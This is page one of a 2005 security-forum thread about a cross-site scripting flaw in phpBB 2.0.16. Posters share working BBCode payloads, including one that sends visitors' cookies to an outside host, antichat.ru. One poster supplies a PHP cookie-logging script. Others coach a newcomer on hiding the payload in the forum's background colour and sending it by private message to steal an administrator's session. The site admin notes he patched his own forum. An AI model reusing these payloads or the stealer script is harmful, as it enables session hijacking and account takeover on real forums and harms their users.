Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
March 19, 2024
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 239
Members: 0
Total: 239
PacketStorm News
·301 Moved Permanently

read more...
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpBB -> phpBB 2.0.16 XSS Remote Cookie Disclosure Exploit Goto page 1, 2, 3, 4, 5, 6, 7, 8  Next
Post new topic  Reply to topic View previous topic :: View next topic 
phpBB 2.0.16 XSS Remote Cookie Disclosure Exploit
PostPosted: Fri Jul 08, 2005 8:11 pm Reply with quote
zer0-c00l
Advanced user
Advanced user
 
Joined: Jun 25, 2004
Posts: 72
Location: BRAZIL!




More info in:
http://www.milw0rm.com/id.php?id=1095
View user's profile Send private message
PostPosted: Sat Jul 09, 2005 2:36 pm Reply with quote
verbatim
Regular user
Regular user
 
Joined: Jul 09, 2005
Posts: 11




waouh, a new flaw in phpBB ! Very Happy

i'm totally new in XSS Remote Cookie exploit, would you be kind to explain me (personnaly or with a good tutorial) how to use this exploit ?

thank you in advance. Wink
View user's profile Send private message
PostPosted: Sat Jul 09, 2005 9:01 pm Reply with quote
diaga
Regular user
Regular user
 
Joined: Jun 27, 2005
Posts: 22




Im getting


Code:
'
View user's profile Send private message
PostPosted: Sun Jul 10, 2005 12:28 am Reply with quote
WaterBird
Active user
Active user
 
Joined: May 16, 2005
Posts: 37




Hmm posted and nothing happening :/
View user's profile Send private message
PostPosted: Sun Jul 10, 2005 2:35 am Reply with quote
subzero
Valuable expert
Valuable expert
 
Joined: Mar 16, 2005
Posts: 42




first of all nothing is there.
and it wont redirect.that link dont exist.

http://www.milw0rm.com/cgi-bin/shell.jpg

this exploit original come from http://antichat.ru/txt/phpbb/
and not ccteam as you can see from the exploit banner in milworm site.

http://antichat.ru/txt/phpbb/ <<< visit here .
View user's profile Send private message Visit poster's website
PostPosted: Sun Jul 10, 2005 5:39 am Reply with quote
g30rg3_x
Active user
Active user
 
Joined: Jan 23, 2005
Posts: 31
Location: OutSide Of The PE




First...
The Cross Site Scripting (aka XSS) bugs
just can executes in the client side

So...
This is not a simply bug that you execute and you get the admin hash

And What Can I Do With This???
You can send a exploit like /str0ke put in milw0rm, of course via pm and you can steal his cookie when it open de PM..
of course as you can read this bug just works with IE and not with others explorers

Can You Give a Poc??
umm the original ho is in russ give to PoC's

The first that prints a JS Alert with message lol
Code:

[url]www.[url=www.s=''style='top:expression(eval(this.sss));'sss=`alert('lol');this.sss=null`s='][/url][/url]'


The second steal a cookie, but you have to put the value of backgrounf inn the place were it comes ЦВЕТ_ФОНА
Code:

[color=ЦВЕТ_ФОНА][url]www.ut[url=www.s=''style='font-size:0;color:ЦВЕТ_ФОНА'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]


obviously like the str0ke bug you have to redirrect as your website for stealing the cookie:
http://antichat.ru/b.gif

so thats all about it

i think this info wold be very useful for some people
if you have questions you can answer here or by my msn..

regards
PD: There is no official patch so have fun...
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
PostPosted: Sun Jul 10, 2005 7:45 am Reply with quote
y3dips
Valuable expert
Valuable expert
 
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




another bbcode flaw combination with Social engineering ,I think *_^

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Sun Jul 10, 2005 8:54 am Reply with quote
verbatim
Regular user
Regular user
 
Joined: Jul 09, 2005
Posts: 11




First, thank you for your answers and your help ! Very Happy

subzero wrote:

this exploit original come from http://antichat.ru/txt/phpbb/
and not ccteam as you can see from the exploit banner in milworm site.

http://antichat.ru/txt/phpbb/ <<< visit here .

yes, i had read it (even if i don't speak russian Wink).

g30rg3_x wrote:

of course as you can read this bug just works with IE and not with others explorers

now i understant why i couldn't see it. lol

g30rg3_x wrote:

The second steal a cookie, but you have to put the value of backgrounf inn the place were it comes ЦВЕТ_ФОНА
Code:

[color=ЦВЕТ_ФОНА][url]www.ut[url=www.s=''style='font-size:0;color:ЦВЕТ_ФОНА'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]


obviously like the str0ke bug you have to redirrect as your website for stealing the cookie:
http://antichat.ru/b.gif

humm, i've 2 questions...
1- the color ЦВЕТ_ФОНА... ... this value has to be changed with a color of the target forum, probably to hide the script... but what color ? you said the backgrounf inn but i don't understand... Embarassed

2- to redirect to our script stealer, by changing the http://antichat.ru/cgi-bin/s.jpg? url... : how to create our own cookie stealer ?

by the way, g30rg3_x, did you manage to use this exploit ?

thank you in advance. Wink
View user's profile Send private message
PostPosted: Sun Jul 10, 2005 10:24 am Reply with quote
subzero
Valuable expert
Valuable expert
 
Joined: Mar 16, 2005
Posts: 42




mmm
g30rg3_x

sorry but i dont understand what do you mean only work on IE ??
Wink

verbatim <<= exploit do work.

exploit.
http://kisobox.com/exploits/phpbb.2.0.16.xss+cookies.stealer.txt

it will be easy to understand by video.
http://kisobox.com/area51/phpbb2.0.16xss/

it will better to have own cookies stealer script rather to depend on antichat.ru
again. if you want to get the hash pass for admin then u just PM him/her.



Wink


Last edited by subzero on Sun Jul 10, 2005 1:55 pm; edited 1 time in total
View user's profile Send private message Visit poster's website
PostPosted: Sun Jul 10, 2005 11:20 am Reply with quote
verbatim
Regular user
Regular user
 
Joined: Jul 09, 2005
Posts: 11




great video subzero ! Very Happy

1- i still wonder... when you write
Quote:
template color,so no one can see it.
// you can do it.. by viewing page source code.

the template has many color... wich one do you mean ?

2- how to have our own cookies stealer script rather to depend on antichat.ru
again ?

thank you. Smile
View user's profile Send private message
PostPosted: Sun Jul 10, 2005 11:48 am Reply with quote
subzero
Valuable expert
Valuable expert
 
Joined: Mar 16, 2005
Posts: 42




about viewing source code. oohh .. Wink too many aa..
well forget bout it.

2. some code
for cookies stealer

<?
if(isset($_GET["c"]))
{
$file = fopen("cookies.txt", "a");
fwrite($file, $_GET["c"]."\n");
fclose($file);
}
?>

Wink
View user's profile Send private message Visit poster's website
PostPosted: Sun Jul 10, 2005 12:20 pm Reply with quote
verbatim
Regular user
Regular user
 
Joined: Jul 09, 2005
Posts: 11




ok, so imagine
1- i create a file cookie.php with inside :
Code:
<?
if(isset($_GET["c"]))
{
$file = fopen("cookies.txt", "a");
fwrite($file, $_GET["c"]."\n");
fclose($file);
}
?>


2- i change url of the exploit :
Code:
[color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]

i tried to replace http://antichat.ru/cgi-bin/s.jpg? by http://mysite.com/cookie.php
but it creates no cookies.txt file, there's probably something wrong in my syntax Confused
View user's profile Send private message
PostPosted: Sun Jul 10, 2005 12:21 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




I was testing this bbcode flaw yesterday and it worked even here, at waraxe.us Laughing

Some remarks:

1. it will work with IE only (no Firefox, etc ...)
2. phpBB team has no clue about this and so most of the phpbb installations in the world are affected.
3. I was making some simple changes to bbcode regexes, so right now this forum is (hopefully) protected from specific exploit.

It's interesting to see, how much time it takes to phpBB developement team to release phpBB version 2.0.17 Wink
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sun Jul 10, 2005 12:30 pm Reply with quote
subzero
Valuable expert
Valuable expert
 
Joined: Mar 16, 2005
Posts: 42




verbatim

have u set chmod 777 to the cookies.txt ?

Wink its good if you release the patch for it.
waraxe.. Wink one of mysite.. vulnerable too.
View user's profile Send private message Visit poster's website
PostPosted: Sun Jul 10, 2005 12:44 pm Reply with quote
verbatim
Regular user
Regular user
 
Joined: Jul 09, 2005
Posts: 11




subzero wrote:
verbatim

have u set chmod 777 to the cookies.txt ?


yes i have... but this file is still empty Confused
any ideas ?
is there a mistake here :
Code:
[color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://mysite.com/cookie.php'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]

finally, did you manage to use this exploit with a personnal stealer script ?

(i know, a lot of question, but i guess it may help other readers Wink)
View user's profile Send private message
phpBB 2.0.16 XSS Remote Cookie Disclosure Exploit
  www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 8  
Goto page 1, 2, 3, 4, 5, 6, 7, 8  Next
  
  
 Post new topic  Reply to topic  




Powered by phpBB © 2001-2008 phpBB Group






Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.200 Seconds